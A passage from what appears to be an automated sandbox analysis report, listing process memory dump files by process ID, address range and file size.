                                                                                                                • memory/4492-342-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4492-368-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4508-269-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.0MB

                                                                                                                • memory/4508-272-0x00000001402CA898-mapping.dmp
                                                                                                                • memory/4508-276-0x0000028F5A120000-0x0000028F5A134000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  80KB

                                                                                                                • memory/4540-264-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4712-367-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4800-357-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4868-281-0x0000000002340000-0x0000000002384000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  272KB

                                                                                                                • memory/4868-247-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-362-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4996-241-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5092-256-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/5092-267-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  3.5MB

                                                                                                                • memory/5092-257-0x00000001401FBC30-mapping.dmp
                                                                                                                • memory/5232-352-0x0000000000402F68-mapping.dmp
                                                                                                                • memory/5300-283-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/5300-287-0x0000000000401480-mapping.dmp
                                                                                                                • memory/5300-292-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  284KB

                                                                                                                • memory/5304-340-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5304-355-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5368-333-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5372-321-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5376-353-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5388-341-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5396-348-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5424-294-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5484-332-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5500-351-0x0000000002D80000-0x0000000002D81000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5500-347-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5560-302-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5588-336-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5592-366-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5724-365-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5744-308-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5756-309-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5788-312-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5800-354-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5852-358-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5876-345-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5912-337-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5916-369-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6000-318-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6008-317-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6088-331-0x0000000000000000-mapping.dmp